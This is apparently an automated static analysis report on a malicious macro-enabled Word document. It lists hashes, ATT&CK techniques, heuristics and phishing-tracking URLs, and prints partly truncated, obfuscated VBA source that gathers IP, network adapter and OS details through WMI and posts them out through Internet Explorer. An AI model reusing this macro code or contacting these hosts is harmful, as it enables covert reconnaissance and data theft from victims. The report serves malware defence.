Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f426b4b5c8081080…

MALICIOUS

Office (OOXML)

38.4 KB Created: 2020-02-10 07:30:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-07-24
MD5: 8e3267ff5d48616492289b8a86a61683 SHA-1: 516b515cde9427d73c309db878336628c6ad71e8 SHA-256: f426b4b5c80810807d5ca844098e19650e17b703402d1985b7d7724e184aec90
150 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The OOXML document contains VBA macros, indicated by the 'OOXML_VBA' heuristic. The script uses 'CreateObject' and 'GetObject' calls, suggesting it attempts to interact with the system or download external content. The presence of a remote image URL in the document's relationships and the VBA code's structure point towards a macro-based downloader. The document body presents a fake form, urging the user to 'Enable Content', a common social engineering tactic.

Heuristics 7

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Remote image (web beacon / tracking pixel) medium OOXML_IMAGE_BEACON
    Document references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi OOXML external relationship
    • https://post.ingos.su/035acff221d8cb7d882cc8e8a64169f482adb3cdfa6b7912In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-propertiesIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-propertiesIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocumentIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-propertiesIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5190 bytes
SHA-256: 22f0950305fe309caf37145b0a0bcfda075234a6cbe6bfab1d795b959c0e012d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"
Private Sub CommandButton1_Click()
   
    MsgBox ("Ïðîèçîøëà îøèáêà.")
    Module1.phxUC
End Sub

Attribute VB_Name = "Module1"
Function MoRwAl(Length As Integer)
Dim cyZfAYwgIIfFvIsATgJwiTdY As Variant
Dim JPdNU As Long
Dim fOTTnnWjFVt As String
cyZfAYwgIIfFvIsATgJwiTdY = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", _
"y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", _
"A", "B", "C", "D", "E", "F", "G", "H", _
"I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", _
"W", "X", "Y", "Z")
For JPdNU = 1 To Length
Randomize
fOTTnnWjFVt = fOTTnnWjFVt & cyZfAYwgIIfFvIsATgJwiTdY(Int((UBound(cyZfAYwgIIfFvIsATgJwiTdY) - LBound(cyZfAYwgIIfFvIsATgJwiTdY) + 1) * Rnd + LBound(cyZfAYwgIIfFvIsATgJwiTdY)))
Next JPdNU
MoRwAl = fOTTnnWjFVt
End Function
Function tDZSy() As String
Dim lkbYi As String
Dim nyUIrqdl As Object
Dim tHpbaCSZwbtwawWuUBFoJryI As Object
Dim HKajOgmuWKoQWMJvgfQJC As Object
Dim twWEGMifiAjaJPBvyTSc As String
Dim ZYMGcZyIK As Integer
lkbYi = "."
twWEGMifiAjaJPBvyTSc = ""
Set nyUIrqdl = GetObject("winmgmts:\\" & lkbYi & "\root\cimv2")
Set tHpbaCSZwbtwawWuUBFoJryI = nyUIrqdl.ExecQuery _
("Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")
For Each HKajOgmuWKoQWMJvgfQJC In tHpbaCSZwbtwawWuUBFoJryI
If Not IsNull(HKajOgmuWKoQWMJvgfQJC.IPAddress) Then
For ZYMGcZyIK = LBound(HKajOgmuWKoQWMJvgfQJC.IPAddress) To UBound(HKajOgmuWKoQWMJvgfQJC.IPAddress)
twWEGMifiAjaJPBvyTSc = twWEGMifiAjaJPBvyTSc & HKajOgmuWKoQWMJvgfQJC.IPAddress(ZYMGcZyIK) & " " & HKajOgmuWKoQWMJvgfQJC.Description(ZYMGcZyIK) & vbCrLf
Next
End If
Next
tDZSy = twWEGMifiAjaJPBvyTSc
End Function
Function CWiZQLNpdAQY() As String
Dim zxTFxoDfJgbnQyQpJIEtUfd As String
Dim PQXxhwIJVZcCOcNKyMRrwmpO As Object
Dim uBtVUmuNzC As Object
Dim VAklWhN As Object
Dim GXMsv As String
zxTFxoDfJgbnQyQpJIEtUfd = "."
GXMsv = ""
Set PQXxhwIJVZcCOcNKyMRrwmpO = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & zxTFxoDfJgbnQyQpJIEtUfd & "\root\cimv2")
Set uBtVUmuNzC = PQXxhwIJVZcCOcNKyMRrwmpO.ExecQuery("Select * from Win32_OperatingSystem")
For Each VAklWhN In uBtVUmuNzC
GXMsv = GXMsv & VAklWhN.Caption & " " & VAklWhN.Version & vbCrLf
Next
CWiZQLNpdAQY = GXMsv
End Function
Sub DQDAaDiPKwRESWiCI(JfoSKuANf As String, olGjMVgRkXODBJPZQhwv As String, gAvRlZFgn As String)
Dim WebBrowser: Set WebBrowser = CreateObject("InternetExplorer.Application")
Dim XZHaouZuPbyfqRWWaZNM() As Byte
ReDim XZHaouZuPbyfqRWWaZNM(Len(olGjMVgRkXODBJPZQhwv) - 1)
XZHaouZuPbyfqRWWaZNM = StrConv(olGjMVgRkXODBJPZQhwv, vbFromUnicode)
WebBrowser.Navigate JfoSKuANf, 2 + 4 + 8, , XZHaouZuPbyfqRWWaZNM, _
"Content-type: multipart/form-data; boundary=" + gAvRlZFgn + Chr(10) + Chr(13)
Do While WebBrowser.busy
DoEvents
Loop
WebBrowser.Quit
End Sub
Function pCnvrdistEp(vpaITyBBcRHDlWGGLNHTKinF As String, CtPjMmpKcDPobsHCyjvI As String, EgkQuHSMoxSYAml As String, nmfOQmboODoOModusSqV As String, bPppYAdTwBJWNywIegr As String, sthptmT As String, Optional ByVal bAsync As Boolean) As String
Dim uUNyb As String
uUNyb = "--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & bPppYAdTwBJWNywIegr & "" & vbCrLf & vbCrLf & _
sthptmT & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & CtPjMmpKcDPobsHCyjvI & "" & vbCrLf & vbCrLf & _
nmfOQmboODoOModusSqV & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & "--"
DQDAaDiPKwRESWiCI EgkQuHSMoxSYAml, uUNyb, vpaITyBBcRHDlWGGLNHTKinF
End Function
Function NmXAAKfdkIGGRFhOW(os As String) As String
Dim yMKTmQMviBN As String
yMKTmQMviBN = Chr(10) & "User:" & E
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 36352 bytes
SHA-256: 8c15345d566f56a544778923f925fca3217c187942de6cae1902b7e642822125